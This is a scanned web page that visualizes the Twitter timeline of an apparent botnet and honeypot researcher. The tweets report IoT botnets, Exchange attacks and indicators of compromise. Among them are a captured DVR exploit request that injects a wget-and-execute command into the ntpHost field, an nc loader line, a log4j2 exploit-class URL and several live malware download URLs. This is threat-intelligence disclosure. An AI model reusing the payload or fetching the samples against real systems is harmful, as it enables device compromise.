thevisualized.com
Open in
urlscan Pro
161.35.51.239
Public Scan
URL:
https://thevisualized.com/twitter/timeline/zom3y3;focused=1064840407308099584
Submission: On July 02 via manual from CA — Scanned from CA
Submission: On July 02 via manual from CA — Scanned from CA
Form analysis
0 forms found in the DOMText Content
* ⚽️ * Trends * Timeline * Topics & Hashtags * -------------------------------------------------------------------------------- * Blog * About Us * Contact Us * Privacy Policy * -------------------------------------------------------------------------------- * Like * Follow * Subscribe * Buy me a Coffee * * ⚽️ * Trends * Timeline * Hashtags * Blog & More * Blog * About Us * Contact Us * Privacy Policy THE VISUALIZED TWITTER PROFILE, ZOM3Y3 (@ZOM3Y3) Search Previous Months Day by Day and Top Twitter Trends with at least a Million Tweets in May 2022 ZoomView 1 monthView 3 monthsView 6 monthsView year to dateView 1 yearView all Created with Highcharts 10.0.0Chart context menu 29. Apr13. May22. Jul7. Oct13. Jan1. Jun15. Jun28. Sep9. Nov5. Apr6. Dec29. Apr22. Jul27. Jan15. Jun1. Mar 6. Dec6. …012040801600300100200400ZoomView 1 month1mView 3 months3mView 6 months6mView year to dateYTDView 1 year1yView allAllApr 10, 2019→Dec 11, 2021RetweetsLikes zom3y3 #Muhstik #Botnet is spreading through #log4j2 RCE now. Exp: http://45.130.229.168:9999/Exploit.class https://t.co/NLrnB1K3im Likes: 316 Retweets: 150 Most Liked Tweet since Apr 10, 2019 Export Line Chart as an Image SINCE APR 10, 2019 Include Replies (41) Include Retweets of others (10) TWEETS 100 INCLUDING REPLIES, RETWEETS LIKES 944 AVG. 9.4 RETWEETS 380 AVG. 3.8 zom3y3's profile Visualized: 100 Tweets with 944 Likes and 380 Retweets Feeling Lucky? Share Timeline More Tweets Ad 1/2 59:57 Next Stay Flycam Trào Lưu Thả Hồn Theo Gió Con Đường Bình Phàm Excuse Me Band - Nếm TV 40 42 00:00 00:00 / 00:00 10 Sec ZOM3Y3 @zom3y3 blog.netlab.360.com/author/yegensh… CHINA APR 24, 2013 NETWORK SECURITY RESEARCHER @360NETLAB #BOTNET #PENTEST #HONEYPOT #SANDBOX OPINIONS AND TWEETS ARE MY OWN 225 TWEETS 1.2K FOLLOWERS 331 FOLLOWING * MENTIONED (AND REPLIED TO) PROFILES BY ZOM3Y3 Share * QNAP Systems, Inc. @QNAP_nas * Hack The World @HacktheWorld13 * 360 Netlab @360Netlab * Alex @alex_bondage * SANS.edu Internet Storm Center @sans_isc * Bad Packets @bad_packets * Shadowserver @Shadowserver * if(is) @_ifis * Chris Dietrich @wavehackr * Alex Edwards @Alex020811881 * Eliran Liberty إليران الحرية @dontMugyou * Y Combinator @ycombinator * Vera Xinyue Shen @xyshen365 * Gitworm @Gi7w0rm * ManchurianClassmate @wonderqs * SMII Mondher @smii_mondher * Michael Genkin @Drag0nR3b0rn * Intezer @IntezerLabs * Nacho Sanmillan 𓅓 @ulexec * n0mad @n0mad42 * Michael Schwarz @misc0110 * ΞnZ0xffff0800 @Meta_Explore * Masafumi Negishi @MasafumiNegishi * Markus Dauberschmidt @daubsi * Dominik @0xTyrox * Yonathan Klijnsma @ydklijnsma * daniel:// stenberg:// @bagder * 𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec * Mikhail Kasimov @500mk500 * R. @0xrb * Michal Malík @michalmalik * RootKiter @RooKiter * ☩MalwareMustDie @malwaremustd1e * Cloudflare @Cloudflare * Pastebin @pastebin * Xia Tianguo 夏甜果 @xiatianguo * Eugene Kaspersky @e_kaspersky * Marco Preuß @marco_preuss * Dan @_xdanx * Ankit Anubhav @ankit_anubhav Created with Highcharts 10.0.0#Botnet#unknown_botnet#botnet_scan#Fbot#IoT#Mozi#Chalubo#unknown_exploit#Muhstik#log4j2#Prometei#CVE_2021_26855#XMRig#WebLogic#phishing#AMT#0day#Dacls#RAT#Lazarus#Gafgyt#Roboto#AVAR2019#Ngioweb#TsunamiChart context menu Export Word Cloud as an Image * SIMILAR PROFILES LIKE ZOM3Y3 Share * No similar Profile(s), try searching! Created with Highcharts 10.0.0Chart context menuzom3y3 is mostly active on Thu around 11PM051015SunMonTueWedThuFri10AM11AM12AM1PM2PM3PM4PM5PM6PM7PM8PM9PM10PM11PMSince Apr 10, 2019 12 Tweets were posted on Thu around 11PM Export Activity Heat Map as an Image Facebook Twitter Pinterest Reddit Telegram LinkedIn Tumblr Vk WhatsApp Line Gmail YouTube Export Line Chart as an Image Export Word Cloud as an Image Export Heat Map as an Image ZOM3Y3'S TWITTER PROFILE SUMMARY 7 #Likes & 4 #Retweets "a new family botnet which contains windows and linux version. c2: https://t.co/WXKQwAaRtQ https://t.co/ukkxnj82I2" https://twitter.com/zom3y3/status/1064840407308099584 🗓 Since Apr 10, 2019 posted 100 Tweets and got 944 #Likes and 380 #Retweets 📊 The Visualized Twitter Profile of zom3y3 zom3y3 (@zom3y3) 1.2K Followers 331 Following 225 Tweets China 📍 Network Security Researcher @360Netlab #Botnet #Pentest #Honeypot #Sandbox Opinions and tweets are my own https://thevisualized.com/twitter/timeline/zom3y3;focused=1064840407308099584 Hashtags used by zom3y3 #Muhstik #Botnet #log4j2 #Prometei #CVE_2021_26855 #XMRig #Fbot #WebLogic #IoT #Mozi #phishing #AMT #0day #Chalubo #Dacls #RAT #Lazarus #Gafgyt #unknown_exploit #Roboto #unknown_botnet #botnet_scan #AVAR2019 #Ngioweb #Tsunami Mentioned (and Replied to) Profiles by zom3y3 QNAP Systems, Inc. @QNAP_nas, Hack The World @HacktheWorld13, 360 Netlab @360Netlab, Alex @alex_bondage, SANS.edu Internet Storm Center @sans_isc, Bad Packets @bad_packets, Shadowserver @Shadowserver, if(is) @_ifis, Chris Dietrich @wavehackr, Alex Edwards @Alex020811881, Eliran Liberty إليران الحرية @dontMugyou, Y Combinator @ycombinator, Vera Xinyue Shen @xyshen365, Gitworm @Gi7w0rm, ManchurianClassmate @wonderqs, SMII Mondher @smii_mondher, Michael Genkin @Drag0nR3b0rn, Intezer @IntezerLabs, Nacho Sanmillan 𓅓 @ulexec, n0mad @n0mad42, Michael Schwarz @misc0110, ΞnZ0xffff0800 @Meta_Explore, Masafumi Negishi @MasafumiNegishi, Markus Dauberschmidt @daubsi, Dominik @0xTyrox, Yonathan Klijnsma @ydklijnsma, daniel:// stenberg:// @bagder, 𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec, Mikhail Kasimov @500mk500, R. @0xrb, Michal Malík @michalmalik, RootKiter @RooKiter, ☩MalwareMustDie @malwaremustd1e, Cloudflare @Cloudflare, Pastebin @pastebin, Xia Tianguo 夏甜果 @xiatianguo, Eugene Kaspersky @e_kaspersky, Marco Preuß @marco_preuss, Dan @_xdanx, Ankit Anubhav @ankit_anubhav DO YOU FIND THEVISUALIZED HELPFUL? Support Me, an appreciation with a Subscribe or got an idea? Hire me, let's work together contact@thevisualized.com Indie Developer running it, marketing it and supporting it over the Weekends! Bookmark this Page. Press (Ctrl/Cmd)+D Trends are visually sorted on the count of platform specific "Data Metrics" to uncover their Analytical Insights. Do you enjoy such visualizations? Let us know with your comments, Email and a quick click to Subscribe. Thank You! Click here to Subscribe! AD READ MORE Top Articles by Valueimpression Valueimpression YouTube Billionaires, there’s an easy way to find most viewed Videos on YouTube! | The Visualized Blog Unmute Mute Complete your Technology stack at an amazing rates; links via Amazon Associates. Proudly hosted on DigitalOcean, get $100 Credits for your Development. Visualized Timelines are more expressive on Larger (Desktop/Laptops) Screen. ZOM3Y3 @zom3y3 1.2K Followers China Line Chart Word Cloud Heat Map * Most Popular Tweet since Apr 10, 2019 3:23 AM ﹒ Dec 11, 2021 #Muhstik #Botnet is spreading through #log4j2 RCE now. Exp: http://45.130.229.168:9999/Exploit.class https://t.co/NLrnB1K3im 316 150 * 1:36 AM ﹒ Aug 31, 2021 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our lasted (and possibly the last) update on the mozi botnet, https://t.co/YNDN6eIO8J blog.netlab.360.com/the-mostly-dea… 0 12 * 1:37 AM ﹒ May 18, 2021 @QNAP_nas @qnap_psirt yes, we have captured and analyzed the zero-day attack. https://t.co/Pvr3vzU8NE https://t.co/tEAGWc3KoG twitter.com/SecurityWeek/s… 0 0 * 1:30 AM ﹒ May 07, 2021 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our follow up blog on the mysterious RotaJakiro backdoor we published on Apr 28, RotaJakiro appears to be the Linux version… 0 14 * 1:43 AM ﹒ Apr 29, 2021 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our latest blog, a mysterious trojan that has been active for more than 3 years with 0 Vt detection, we don't exactly know t… 0 32 * 8:14 AM ﹒ Apr 27, 2021 The attacker (182.160.112.151) spent a lot of time to attack the Microsoft Exchange servers. https://t.co/L4ai9IMcia 0 0 * 8:18 AM ﹒ Apr 19, 2021 #Prometei #botnet is attacking Microsoft Exchange server now. URL: http://178.21.164.68/dwn.php?b64=1&d=nethost64C.exe Scanner IP: 209.37.253.178 https://t.co/COFoNFO68f 35 20 * 3:42 AM ﹒ Apr 09, 2021 VT Dection https://t.co/Oc7Kx1bQhA https://t.co/9SEcC4ftPx https://t.co/iNCm8ut0kN virustotal.com/gui/url/7181f4… 0 0 * 2:32 AM ﹒ Apr 09, 2021 Two follow-ups about Exchange vulnerability attacks: 1. The target email address include: administrator@btrc.gov.bd , leecher88@hotmail.com 2. An attacker frequently attacks through the original webshell planting another webshell(http://182.160.112.151/test/2.aspx ). https://t.co/BP1sQoCoxC 3 3 * 2:13 PM ﹒ Mar 30, 2021 @Hacktheworld13 @360Netlab All the urls mentioned at the end of our blog are still alive, and you can download these samples :) 1 0 * 6:04 AM ﹒ Mar 26, 2021 #CVE_2021_26855 #XMRig mining attack https://t.co/36zSKrt56q https://t.co/ZFrGqc5eTT blog.netlab.360.com/microsoft-exch… 4 2 * 10:57 AM ﹒ Mar 15, 2021 I have caught the PoC, such as implanting webshell, obtaining email information, etc., and then waiting to see the spread of malicious samples https://t.co/NyyJLpwsfU 4 1 * 9:44 AM ﹒ Mar 15, 2021 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our latest blog, a new botnet, ZHtrap, turns infected devices into honeypot to help it find more victims, as well as using p… 0 11 * 7:15 AM ﹒ Mar 10, 2021 @alex_bondage ClickHouse + Redash 0 0 * 6:04 AM ﹒ Mar 10, 2021 Anglerfish honeypot - Microsoft Exchange vulnerability (CVE-2021-26855) scan in the wild https://t.co/u4cL52WIZn 3 1 * 3:44 AM ﹒ Mar 06, 2021 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our latest blog, QNAP NAS users, check your firmware now, we started to see attack targeting QNAP NAS 4 days ago, and the at… 0 4 * 1:56 AM ﹒ Mar 04, 2021 We have seen #Fbot #botnet using multiple 0 days before(some of them we have not disclosed yet) and it has been targeting various IoT devices, now, it is aiming a new category, traffic and transportation smart devices. https://t.co/l90JIbx3Mt twitter.com/360Netlab/stat… 4 0 * 10:42 AM ﹒ Oct 30, 2020 @sans_isc https://t.co/ruk2mnYUIx twitter.com/zom3y3/status/… 2 2 * 10:31 AM ﹒ Oct 30, 2020 #WebLogic Console Portal vulnerability (CVE-2020-14882) in the wild https://t.co/CwyboQgo96 3 0 * 1:57 AM ﹒ Oct 15, 2020 @bad_packets Our team (360Netlab) tries to do something, and we have a channel with CNCERT on handling Mozi Botnet in China, and it's a hard and complicated work. 0 0 * 0:19 PM ﹒ Oct 14, 2020 @Shadowserver @_ifis @wavehackr https://t.co/SlJw2luHZ0 twitter.com/zom3y3/status/… 1 0 * 10:00 AM ﹒ Oct 14, 2020 There is a new activitiy from a large-scale #IoT #Botnet (#Mozi), it attacks a lot of IoT devices from China and India. It has no major version updates from the end of 2019 to August 2020. Winter is Coming ... https://t.co/SNqju2FJNv 14 11 * 2:12 AM ﹒ Oct 13, 2020 @Alex020811881 @dontMugyou It is a part of payloads which fbot uses linux command "echo" to write a binary file (fbot downloader), and the other linux commands also include: wget, tftp. As you can see in the IDA screenshot, if the "echo" command works well, it will execute the bianry file. https://t.co/snquaUjREG 0 0 * 7:42 AM ﹒ Oct 10, 2020 The affected telnet banner information in the Fbot sample. url: http://185.172.110.240/bot.arm4 md5: eecfce993a49eb5bfaed189d5d7dae2e https://t.co/CX44TSAp83 12 3 * 7:18 AM ﹒ Oct 10, 2020 The latest activities of 2 large-scale botnets: 1. #Mozi #Botnet ip address switches from India to China 2. #Fbot #Botnet cracks telnet service through 467 sets of hard-coded username and password, which are related to the banners, and causes a network scan spike from Vietnam. https://t.co/EoeqGGw5Ic 63 24 * 3:03 PM ﹒ Oct 01, 2020 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our latest blog, A new IoT botnet spreads through two zero-day vulnerabilities targeting Tenda routers https://t.co/ZpYNjQD… 0 10 * 1:43 AM ﹒ Sep 01, 2020 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our latest blog, a new attack targeting QNAP NAS devices, there is no public available PoC now, but attacker is quietly usin… 0 17 * 2:33 AM ﹒ Jul 23, 2020 @bad_packets @ycombinator Maybe Synology DSM 1 1 * 2:02 AM ﹒ Jul 23, 2020 @bad_packets 😀https://t.co/HNYZCEjzb6 https://t.co/VxMfzqXuRk news.ycombinator.com/item?id=239208… 3 0 * 9:03 AM ﹒ Jun 19, 2020 the Stats of Anglerfish Honeypot https://t.co/auycpde39v https://t.co/1lojV1bxjm twitter.com/zom3y3/status/… 1 0 * 8:59 AM ﹒ Jun 19, 2020 There are so many honeypots on the Internet that use my fuzzing feature, but not all of them can capture 0-day vulnerability attacks, nor are they Anglerfish honeypots. 😉 https://t.co/Ota9HrBp1p 5 1 * 3:08 AM ﹒ Jun 18, 2020 All reports are based on IoT exploits, excluding some protocols such as Telnet and SSH. https://t.co/W8jp3oF3hi https://t.co/hxCegSoRUy twitter.com/zom3y3/status/… 2 2 * 1:46 AM ﹒ Jun 17, 2020 @xyshen365 https://t.co/fuZmZFN99L mp.weixin.qq.com/s/O7IuAZV1Xuog… 0 0 * 6:01 AM ﹒ Jun 16, 2020 Anglerfish Honeypot - IoT Threats Dashboard https://t.co/Uz2UsGfcgf 10 2 * 10:11 AM ﹒ Jun 05, 2020 @Gi7w0rm ClickHouse + Redash 0 0 * 7:07 AM ﹒ Jun 05, 2020 another phishing email subject word cloud https://t.co/KTNTZZyblb 2 1 * 2:55 PM ﹒ Jun 04, 2020 @wonderqs no 0 0 * 9:10 AM ﹒ Jun 04, 2020 https://t.co/ckdNRBhcFc https://t.co/sxZaFP5EDD twitter.com/zom3y3/status/… 0 0 * 8:04 AM ﹒ Jun 04, 2020 In the past 3 years, my SMTP honeypot received 121,674 deduplicated #phishing email subjects, and received an average of 2,000 emails per day. https://t.co/Ab41OLaSOx 0 0 * 11:06 AM ﹒ Jun 02, 2020 More and more Linux/IoT malware samples spread through zero-day vulnerabilities or multiple n-day vulnerabilities. https://t.co/yoClwrTHHV 7 0 * 1:51 AM ﹒ Jun 02, 2020 @xyshen365 争取近期出一篇分享文章 0 0 * 8:43 AM ﹒ Jun 01, 2020 @smii_mondher ClickHouse + Redash + Yara 0 0 * 8:26 AM ﹒ Jun 01, 2020 IoT N-day exploit statistics report for the past 3 years https://t.co/cM2S0S6P2q 15 7 * 1:58 PM ﹒ Apr 15, 2020 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our latest blog, Multiple fiber routers are being compromised by botnets using another 0-day. Three groups are trying to use… 0 6 * 3:17 AM ﹒ Apr 12, 2020 @Drag0nR3b0rn Done. https://t.co/hLpyiivrMQ 2 0 * 6:24 AM ﹒ Apr 11, 2020 It's my analysis notes of 2019 IoT advanced malware threat (AMT ) research. Hope to study and communicate with you. you can forward it, and leave some valuable suggestions, thank you. #IoT #AMT https://t.co/uO6LAixI1T https://t.co/SNu0UiJkoU docs.google.com/spreadsheets/d… 28 9 * 4:53 PM ﹒ Mar 27, 2020 Packet sniffer is one of the main methods for gathering special information. #0day https://t.co/aEAphLktKf twitter.com/360Netlab/stat… 2 0 * 3:58 PM ﹒ Mar 20, 2020 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our latest blog, multiple botnets are spreading using LILIN DVR 0-day, guess 0 days are no more just reserved for APTs, and… 0 20 * 4:16 AM ﹒ Feb 17, 2020 It shows that some files on these IP address are connected with each other, and the 0-day attacker behind it is linked to #Chalubo(ChachaDDoS). IoC: 103[.]27.185.139 103[.]82.143.51 https://t.co/U0IFKyow0f https://t.co/3WdM7oFRvz https://t.co/vowSyJ7g1A https://t.co/2CfcKyWqj9 twitter.com/zom3y3/status/… 9 1 * 2:50 AM ﹒ Jan 21, 2020 @IntezerLabs @ulexec more IoC: https://t.co/YuQT8SEllI twitter.com/zom3y3/status/… 4 0 * 1:43 AM ﹒ Jan 19, 2020 @n0mad42 😀 1 0 * 0:49 AM ﹒ Dec 18, 2019 New #Dacls #RAT Linked to #Lazarus Group https://t.co/nzCjoJSl1j https://t.co/vI6EwbYIEt blog.netlab.360.com/dacls-the-dual… 6 0 * 4:24 AM ﹒ Dec 02, 2019 On Nov 19 2019, I found an unknown exploit was targeting for a webpage named "sntp", and loading #Gafgyt #Botnet. Samples: http://cncg[.]me/z #unknown_exploit https://t.co/A0QPBdNGtz 7 0 * 4:17 AM ﹒ Dec 02, 2019 On Aug 30 2019, I found an unknown exploit was targeting for a DVR device, and loading #Chalubo #Botnet. Still Zero Detection on VT: http://103[.]27.185.139/icatchplugin1 (10ac26ef8571896efa3ee9495c0b71f5) http://103[.]27.185.139/icatch.1.3.23s #unknown_exploit https://t.co/n4Bj5xzvF4 14 2 * 3:44 AM ﹒ Nov 25, 2019 @IntezerLabs @ulexec Related sample: 2808d554258c9d93c44cf259f5627630 1 0 * 2:12 PM ﹒ Nov 20, 2019 #Roboto #Botnet #unknown_botnet https://t.co/aGqiE9xzHW twitter.com/360Netlab/stat… 0 0 * 4:05 AM ﹒ Nov 11, 2019 Hunting Advanced IoT Malware https://t.co/hdDjSGyXom drive.google.com/file/d/1XYZu-i… 180 74 * 3:46 AM ﹒ Oct 16, 2019 Botnet Scan Report for Payload MD5: c601610b5a86293af8ac90ff0e43da24 Exploits Tag: JAWS_DVR_RCE Samples Info: 2019-10-15 00:13:09 07f20725bc544959bdc3b672071a5a33 http://scan[.]switchnets[.]net/x #botnet_scan https://t.co/KXTaegDx60 4 0 * 4:02 AM ﹒ Oct 12, 2019 The moobot botnet started to infect the Shenzhen TVT camera a few days ago, and identified the device fingerprint before loading itself, but then it removed this step and directly worm-scanned and exploited it. Samples Info: nc 93.174.93.178 31337 #botnet_scan https://t.co/eyK4lgZmvx 33 23 * 7:24 AM ﹒ Sep 26, 2019 Botnet Scan Report for Payload MD5: 5bdc18aad62bda533df6b7f538388a6b Exploits Tag: Zyxel_VIEWLOG_RCE Samples Info: 2019-09-25 00:15:17 e274ef516bc1577fb2d6e62ac5a6da15 http://136[.]144[.]200[.]209/trixbins.sh https://t.co/UywdwGFgc5.S #botnet_scan https://t.co/xeMCHqt3AM TrojanDownloader.SH 5 2 * 11:28 AM ﹒ Sep 20, 2019 When I am hunting for some interesting ELF samples, I find an IoT sample again which is used for CTF and contains some interesting string. @misc0110 md5: d2769c67b0524eb73fdbbe6eb43ca8f7 Interesting string: https://t.co/hiKUudsiUZ 185.228.137.2 [ IoT Control Server ] https://t.co/gKLfKhf5l2 iot.attacking.systems 7 2 * 1:52 AM ﹒ Sep 12, 2019 @Meta_Explore I will publish the English version after #AVAR2019. 1 0 * 2:02 AM ﹒ Sep 06, 2019 @MasafumiNegishi I have noticed it too and it contains XiongMai DVRIP 0-day RCE exploit which is similar to Fbot's but not the same timestamp in the zip file or exploit style. 1 0 * 7:40 AM ﹒ Aug 25, 2019 If you want to know how I captured advanced IoT malware. There is a Chinese version here. https://t.co/FQYzJpoizt drive.google.com/open?id=1H_NX2… 17 8 * 0:40 PM ﹒ Aug 02, 2019 Some Fiberhome routers are being utilized as SSH tunneling proxy nodes https://t.co/gOOXxELXUr blog.netlab.360.com/some-fiberhome… 7 3 * 7:18 AM ﹒ Jul 30, 2019 After decrypting this password, it displays some curse words in Chinese.(狗逼滚) 😅 https://t.co/hF3fovtfIG 0 0 * 4:33 AM ﹒ Jul 26, 2019 @tinyseashells In fact, the "Communication attempt" is a part of Linux.Ngioweb bot's original behavior and I write is as a subtitle, but I don't do it. "Communication attempt" is a combined of reverse engineering and behavior analysis. 1 0 * 4:07 AM ﹒ Jul 26, 2019 @tinyseashells Linux.Ngioweb is a type of Proxy Botnet, I have been hunting for unknown botnet(#unknown_botnet) for a long time. I can learn a lot of malware attack and defense skills from it and it's very interesting. 😃 2 1 * 3:43 AM ﹒ Jul 26, 2019 @tinyseashells "Communication attempt" means try to connect to Staget-1 C2. When it establishes communication with Stage-1 C2, and proceed to the next step according to the instructions returned by C2. https://t.co/VQniSuBplD 0 0 * 3:32 AM ﹒ Jul 26, 2019 @tinyseashells It's our In-depth analysis report Linux.Ngioweb Botnet for network security area, and readers need to have some expertise. 1 0 * 3:49 PM ﹒ Jul 24, 2019 https://t.co/UtvABhNF54 exploit-db.com/docs/33253 3 0 * 3:43 PM ﹒ Jul 24, 2019 SQL Injection in Update 🧐 https://t.co/lUrmQLelAT 4 1 * 2:09 PM ﹒ Jul 24, 2019 @daubsi @0xTyrox @ydklijnsma If you want to read more about it, here is a slideshow about anglerfish honeypot. https://t.co/xA7NnUO9XX twitter.com/zom3y3/status/… 3 0 * 3:52 AM ﹒ Jul 08, 2019 @360Netlab @bagder curl -H 'accept: application/dns-json' -i "https://t.co/onMtK23ZIN" https://t.co/yfbg0xigsx cloudflare-dns.com/dns-query?name… 3 1 * 10:12 PM ﹒ Jul 03, 2019 @netresec mitmproxy 0 0 * 11:32 AM ﹒ Jul 01, 2019 Retweeted via @360Netlab Access 360 Netlab's Tweet Here RT @360Netlab: Our latest blog, Godlua Backdoor, it is something a little bit special, it uses a combination of hardcoded dns name, https:/… 0 31 * 2:47 PM ﹒ Jun 21, 2019 @500mk500 @0xrb Yes, they’re very similar and we have referred this article in our blog. 2 0 * 10:54 AM ﹒ Jun 21, 2019 #unknown_botnet #Ngioweb https://t.co/YlgaF8wmK1 twitter.com/360Netlab/stat… 4 2 * 1:17 PM ﹒ May 14, 2019 @michalmalik @MasafumiNegishi It shares some codes with mirai, but I don’t think it’s a mirai variant. 0 0 * 10:54 AM ﹒ May 14, 2019 @MasafumiNegishi @RooKiter has noticed that it’s encryption algorithm is very similar to fbot which we have reported in our blog. https://t.co/8uDvXF7QZK https://t.co/q4PLXFAokq blog.netlab.360.com/the-new-develo… 1 0 * 10:44 AM ﹒ May 14, 2019 @MasafumiNegishi Yes, It's a new version, and adds some mirai's code now. 0 0 * 9:17 AM ﹒ May 14, 2019 It's a new family of DDoS botnet which supports 2 types of DDoS attacks(UDP, TCP). c2: cnc[.]mariokartayy[.]com:52869 (not active now) md5: c7f77db8cb3b353b9a238cd7e515de20 https://t.co/aRoXYRA9qx 5 4 * 6:08 AM ﹒ May 11, 2019 @malwaremustd1e @Cloudflare @pastebin 没想到MMD这么不堪一击,笑死我了🤣🤣🤣 指出你的技术错误,你狡辩三连,而且还老是扯上中国威胁论。确实,你们最应该敬畏中国,不仅是在网络安全领域。 0 0 * 7:38 PM ﹒ May 10, 2019 @malwaremustd1e @Cloudflare @pastebin In fact, you have made several wrong consultations about the malware analysis. Funny enough 🤣🤣🤣🤣🤣🤣🤣🤣🤣 0 0 * 5:13 PM ﹒ May 10, 2019 @malwaremustd1e @Cloudflare @pastebin As I tweeted to you about a week ago, you made a wrong conclusion about the lua embed botnet. With the help of my colleague Alex.Turing, I can confirm that it can accept 9 types of commands, as shown below. Here are some lua binary files, you may want to analysis it. https://t.co/WWFj0QtmF1 0 0 * 4:35 PM ﹒ May 10, 2019 @malwaremustd1e @Cloudflare @pastebin OK, I will try to communicate whith the domain owner about the malicious url. BTW, there are two botnets use the "kerberods" as filename, one is embed lua, and the other one is coded with golang. Maybe They are from the different botnet group but share some linux shell code. 0 0 * 4:24 PM ﹒ May 10, 2019 @xiatianguo I have tested it by post parameter, and it doesn't work. BTW, they have the different file size and embed strings. Thank you anyway. 1 0 * 3:26 PM ﹒ May 10, 2019 @malwaremustd1e @Cloudflare @pastebin You should not block gwjyhs[.]com, because it is a free images hosting website which used by the attacker.🤣 1 0 * 3:06 PM ﹒ May 10, 2019 https://t.co/SkXSs79GKn 0 0 * 1:25 PM ﹒ May 10, 2019 Do you know this 404 php webshell which file size is about 2.6 KB https://t.co/8vYVNlwg9B 3 2 * 10:19 AM ﹒ May 08, 2019 It's a new family of IRC botnet which targets for 4 types of operating systems including MacOS, Linux, FreeBSD and Windows. c2: uwsedrftgyhujikol[.]sytes[.]net:8080 (not active now) https://t.co/PypMHpJNIS https://t.co/dJFablGKMB virustotal.com/#/domain/uwsed… 6 0 * 9:29 AM ﹒ May 08, 2019 It's a new family of DDoS botnet which supports 3 types of DDoS attacks. c2: 176.32.35.23:12956 (not active now) md5: 10c73149cdf2690e7e82b4aec40eb383 #unknown_botnet https://t.co/HXZbB5ULw7 4 0 * 10:37 AM ﹒ May 05, 2019 @malwaremustd1e The C2 is c[.]heheda[.]tk:65314 and d[.]heheda[.]tk:443 is the download server. 2 0 * 9:39 AM ﹒ May 05, 2019 It's a variant of Tsunami Botnet, and it supports 22 types of DDoS attacks, kills 360+ known bots(filename), contains 7 methods of exploits and uses "fast-flux" technology for hiding download server. md5: 8ad6a59dff8fd98529ffab0badec8187 c2: 54.36.212.123:8067 #Tsunami #Botnet https://t.co/te40MwRaG6 48 13 * 10:28 AM ﹒ Apr 10, 2019 @e_kaspersky @marco_preuss @_xdanx quite different to your most attacked services https://t.co/UyvnWKdX5N 1 0 * 9:06 AM ﹒ Apr 10, 2019 It accept 2 methods of C2 command, one is download and execute a remote file and the other one is DDoS attack(TCP Flood, UDP Flood and HTTP Flood). https://t.co/XCbXLKnkaP 3 1 * 6:28 AM ﹒ Apr 10, 2019 @ankit_anubhav I just catch this exploit payload in my honeypot, and I am not the one who discover this vuln, so I don't want to request a CVE ID. I have searched it on google and no thing matched, but there are some devices have been recorded on shodan. 2 0 * 3:57 AM ﹒ Apr 10, 2019 a new family of DDoS botnet, probably c2: 167.99.8.99:5010 sample url: http://167[.]99.8.99:80/nr.a6 054ec18660bab0fc4da4d0495c840483 #unknown_botnet https://t.co/UIbw5wbRgl 1 0 * 3:12 AM ﹒ Apr 10, 2019 POST //webs/sysTimeCfgEx HTTP/1.1 Host: {target} Accept-Encoding: identity Content-Length: 186 systemdate=2019-3-27&systemtime=15:39:32&dwTimeZone=30&updatemode=0&ntpHost=$(wget http://181.174.166.164/welcom -O/tmp/welcome;/bin/sh ./tmp/welcome)&ntpPort=123&timezonecon=0 2 0 * 2:48 AM ﹒ Apr 10, 2019 @0xrb Yes, It's the newest c2. It changes the c2 after I reported it. 1 0 * Load More Tweets × ZOM3Y3 (@ZOM3Y3) , THE VISUALIZED TWITTER PROFILE Tue Nov 20 11:18:31 +0000 2018 View it on Twitter a new family botnet which contains windows and linux version. c2: https://t.co/WXKQwAaRtQ https://t.co/ukkxnj82I2 51.microsft-update.com Reply 7 Likes 4 Retweets Twitter Profile Details Network Security Researcher @360Netlab #Botnet #Pentest #Honeypot #Sandbox Opinions and tweets are my own * zom3y3 @zom3y3 * 1.2K Followers * 331 Following * China * blog.netlab.360.com/author/yegensh… View it on Twitter Tweet ShareClose Tweet ShareClose × APPRECIATE US ON SOCIAL MEDIA Like Follow Subscribe Buy me a Coffee Email Subscription Press Ctrl+D to Bookmark this Page. You intend to comply our Privacy Policy CoronaVirus over the Time 🦠 Close Like Follow Subscribe Buy me a Coffee Copyright © 2022. All rights reserved! - TheVisualized. By using TheVisualized, you intend to comply our Privacy Policy. We use cookies on our website to monitize and to provide better user experience. You can adjust your google / browser settings or sadly choose not use our Application. Ad Feedback on this ad Already bought this Not interested in this Ad with offensive content We'll try not to show that ad again Closing ad...